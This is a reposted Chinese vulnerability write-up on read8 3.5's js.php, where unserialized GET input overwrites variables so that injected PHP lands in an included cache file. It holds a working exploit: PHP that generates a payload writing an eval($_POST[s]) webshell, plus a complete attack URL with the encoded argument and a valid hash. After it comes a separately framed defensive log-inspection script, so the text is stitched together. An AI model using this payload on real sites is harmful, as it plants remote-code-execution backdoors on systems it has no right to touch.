
read8 3.5 (读吧) source code analysis: getshell in a novel publishing system

Source: 自学PHP网    Date: 2015-04-17 13:03


./js.php

    $arguments = $hash = '';
    isset($_GET['argument']) && $argument = $_GET['argument'];
    isset($_GET['hash']) && $hash = $_GET['hash'];
    $arguments = unserialize(base64_decode($argument)); // $arguments comes from GET (serialize(), then base64_encode())
    print_r($arguments);
    if(empty($arguments) || !is_array($arguments))
        jsdie('Bad Request. Please check your argument.');
    if(empty($hash) || $hash != md5($argument)) // condition 1
        jsdie('Bad Request. Please check your hash.');

    echo __TAB_NOVEL__;
    foreach($arguments as $k => $v) // variable overwrite, read on
        $$k = $v;
    echo "<h1>$YXNkYXNk||".$_SYSTEM['SYSTEM']['SITE_ADDR']."</h1>";

    if(empty($limit) || !ris_int($limit)) // condition 2
        jsdie('Bad Request. Please limit a number.');
    ... several lines omitted ...

    switch($kind) {
        case 'vip':
            $table = __TAB_NOVEL__;
            $where = 'vip = 1';
            break;
        case 'original':
            $table = __TAB_NOVEL__;
            $where = 'author_id > 0';
            break;
        case 'copied':
            $table = __TAB_NOVEL__;
            $where = 'author_id = 0';
            break;
        default :
            $args = explode('_', $subject);
            if(count($args) == 3 && $args[2] && ris_int($args[2])) {
                $table = $args[0] == 'story' ? __TAB_STORY__ : __TAB_NOVEL__;
                $where = ($args[1] == 'content' ? 'content' : 'subject').' = '.$args[2];
            }
            break;
    }

    if(!$table) // condition 3
        jsdie('Bad Request. Please choose a method.');

    $jscachefile = ROOT."data/cache/js_$hash.php"; // $hash comes straight from GET

    $update = false;
    if(!file_exists($jscachefile) || (TIMESTAMP - filemtime($jscachefile) >= $cachetime))
        $update = true;

    if($update) {
        $content = "<?php if(!defined('IN_Read8')) exit('Access Denied'); ?>\n"; // the executed file must contain this guard; keep reading

        //$sql = "SELECT b.id, b.title, b.type_id, b.author, c.dateline, c.title as chapter_title, c.$cid AS cid, v.name as volume_name FROM ".__TAB_BOOK__." b LEFT JOIN ".__TAB_CHAPTER__." c ON b.newchapterid=c.id LEFT JOIN ".__TAB_VOLUME__." v ON v.id=c.volume_id WHERE $where ORDER BY b.updatetime DESC LIMIT $limit";
        //$result=$db->query($sql);
        $wblock = $db->select(array(
            'field' => 'id, title, author, subject, content, dateline, lastupdate',
            'from' => $table,
            'where' => 'WHERE state IN (1, 2, 3) AND '.$where,
            'order' => 'lastupdate DESC',
            'limit' => $limit,
            'filter'=> 'convert_'.($table == __TAB_NOVEL__ ? 'novel' : 'story').'_classes',
        ));

        $wblock = replace(html_show($wblock, false));
        if(!empty($charset) && $charset != SYSCHARSET) $wblock = convert($wblock, SYSCHARSET, $charset);

        addjs('document.writeln("<style type=\"text/css\" />");');
        addjs('document.writeln(" .update div.content {background: #F7F7F7;margin-top: 1px;width: 100%;padding: 5px 0;}");');
        addjs('document.writeln(" .update div div.left {float: left;margin-left: 3px;width: 70%;}");');
        addjs('document.writeln(" .update div div.right {float: right;margin-right: 3px;width: 20%;}");');
        addjs('document.writeln("</style>");');
        addjs('document.writeln("<div class=\"update\">");');

        $external = empty($openewindow) ? '' : ($openewindow == 'target' ? ' target=\"_blank\"' : (($openewindow == 'rel') ? ' rel=\"external\"' : ''));
        foreach($wblock as $val) {
            addjs('document.writeln("<table>");'); // using the variable overwrite we replace $_SYSTEM['SYSTEM']['SITE_ADDR'], and that is enough
            addjs('document.writeln("<tr><td align=\"left\" width=\"70%\">&nbsp;['.$val['subject'].']&nbsp;<a href=\"'.$_SYSTEM['SYSTEM']['SITE_ADDR'].'/'.($table == __TAB_NOVEL__ ? 'novel' : 'story').'.php?bid='.$val['id'].'\"'.$external.' style=\"color: Green;\">'.$val['title'].'</a>&nbsp;</td>");');

            addjs('document.writeln("<td align=\"right\" width=\"30%\">'.$val['author'].'</a>&nbsp;&lt;'.rdate($val['lastupdate'], 'm-d').'&gt;</td></tr>");');
            addjs('document.writeln("</table>");');
        }
        unset($wblock);

        addjs('document.writeln("</div>");');

        ;
        if(!rfow($jscachefile, $content)) // rfow() is just file_put_contents(); I will not paste its code
            jsdie('Can\'t write cache file. Please check your permission.');
    }

    (!include $jscachefile) && jsdie('Can\'t read cache file. Please check your permission.'); // include; this looks a lot like that DedeCMS code

Exploitation method:

    <?php
    $a=array("limit"=>'1','_SYSTEM'=>array('SYSTEM'=>array('SITE_ADDR'=>"<?php file_put_contents('./c.php','<?php eval(\$_POST[s])?>')?>")),'kind'=>'original');
    echo serialize($a);
    ?>
 
Generate the serialized array, base64-encode it, then md5 the result. URL: /js.php?argument=YTozOntzOjU6ImxpbWl0IjtzOjE6IjEiO3M6NzoiX1NZU1RFTSI7YToxOntzOjY6IlNZU1RFTSI7YToxOntzOjk6IlNJVEVfQUREUiI7czo2MjoiPD9waHAgZmlsZV9wdXRfY29udGVudHMoJy4vYy5waHAnLCc8P3BocCBldmFsKCRfUE9TVFtzXSk/PicpPz4iO319czo0OiJraW5kIjtzOjg6Im9yaWdpbmFsIjt9&hash=ccfe8712c8669cf53b3a049f7872de86. This vulnerability is somewhat like the DedeCMS one: a variable overwrite, then a database query, then a file is written, then it is included. Only the process is similar. Tested locally.
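From the defender's side, the useful observation in the listing above is that js.php only ever reads a handful of scalar keys out of the unserialized array (limit, kind, subject, charset, openewindow, cachetime), so any request whose `argument` decodes to other keys, to nested arrays, or to strings carrying a PHP open tag is abusing the `$$k = $v` loop. The script below is an added example, not code from the page or from read8: it decodes the `argument` parameter from an Apache/Nginx-style access-log line, parses the PHP-serialized array with a small hand-written parser, and reports those three anomalies. The log format, the key whitelist and both sample requests are assumptions constructed for the example; the hash is computed as md5 of the base64 string, as the listing's condition 1 requires.

```python
import base64
import hashlib
import re
from urllib.parse import parse_qs, urlsplit

# Keys js.php actually reads after the foreach($arguments as $k => $v) $$k = $v loop
# (assumed from the page's listing). Any other key clobbers some other script variable.
ALLOWED_KEYS = {"limit", "kind", "subject", "charset", "openewindow", "cachetime"}


def php_serialize(value) -> str:
    """Produce PHP serialize() output for str/int/bool/dict, enough to build samples."""
    if isinstance(value, bool):
        return f"b:{int(value)};"
    if isinstance(value, int):
        return f"i:{value};"
    if isinstance(value, str):
        raw = value.encode("utf-8")  # PHP counts bytes, not characters
        return f's:{len(raw)}:"{raw.decode("latin-1")}";'
    if isinstance(value, dict):
        body = "".join(php_serialize(k) + php_serialize(v) for k, v in value.items())
        return f"a:{len(value)}:{{{body}}}"
    raise TypeError(f"unsupported type {type(value).__name__}")


def php_unserialize(data: str):
    """Minimal parser for PHP serialize() output (s, i, b, N, a).
    `data` must be latin-1 decoded so one character equals one byte (PHP lengths are bytes)."""
    pos = 0

    def parse():
        nonlocal pos
        t = data[pos]
        if t == "N":  # N;
            pos += 2
            return None
        if t in "ib":  # i:123;  b:1;
            end = data.index(";", pos)
            num = int(data[pos + 2:end])
            pos = end + 1
            return bool(num) if t == "b" else num
        if t == "s":  # s:5:"limit";
            colon = data.index(":", pos + 2)
            length = int(data[pos + 2:colon])
            start = colon + 2
            pos = start + length + 2
            return data[start:start + length]
        if t == "a":  # a:2:{key value key value}
            colon = data.index(":", pos + 2)
            count = int(data[pos + 2:colon])
            pos = colon + 2
            items = {}
            for _ in range(count):
                key = parse()
                items[key] = parse()
            pos += 1  # closing brace
            return items
        raise ValueError(f"unsupported type {t!r} at offset {pos}")

    return parse()


def inspect_request(log_line: str) -> list:
    """Return findings for one access-log line; an empty list means nothing odd was seen."""
    m = re.search(r'"(?:GET|POST) (\S+) HTTP/', log_line)
    if not m:
        return []
    url = urlsplit(m.group(1))
    if not url.path.endswith("/js.php"):
        return []
    params = parse_qs(url.query, keep_blank_values=True)
    argument = params.get("argument", [""])[0].replace(" ", "+")  # undo '+' -> ' ' from URL decoding
    try:
        raw = base64.b64decode(argument, validate=True).decode("latin-1")
        decoded = php_unserialize(raw)
    except Exception as exc:
        return [f"argument does not decode: {exc}"]
    if not isinstance(decoded, dict):
        return ["argument is not a PHP array"]
    findings = []
    for key, value in decoded.items():
        if key not in ALLOWED_KEYS:
            findings.append(f"unexpected key {key!r}: overwrites a script variable")
        if isinstance(value, dict):
            findings.append(f"nested array under {key!r}: js.php only expects scalars")
    if "<?" in raw:  # any string anywhere in the array carrying a PHP open tag
        findings.append("PHP open tag inside argument: would be written into data/cache/js_<hash>.php")
    return findings


def make_log_line(args: dict) -> str:
    """Constructed sample line: serialize, base64 and md5 exactly as js.php expects."""
    b64 = base64.b64encode(php_serialize(args).encode("latin-1")).decode()
    digest = hashlib.md5(b64.encode()).hexdigest()
    return (f'203.0.113.5 - - [17/Apr/2015:13:03:00 +0800] '
            f'"GET /js.php?argument={b64}&hash={digest} HTTP/1.1" 200 512')


# Constructed samples: a legitimate widget request and one that smuggles in $_SYSTEM.
BENIGN = make_log_line({"limit": "10", "kind": "original"})
SUSPICIOUS = make_log_line({
    "limit": "1",
    "_SYSTEM": {"SYSTEM": {"SITE_ADDR": "<?php /* constructed placeholder */ ?>"}},
    "kind": "original",
})
```

Run over a real log, `inspect_request` would be applied to every line and any non-empty result alerted on; the same whitelist is also the fix on the application side, since replacing `$$k = $v` with an explicit copy of the six expected keys removes the overwrite entirely.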
 
 
 
 
Author: 狗一样的男人
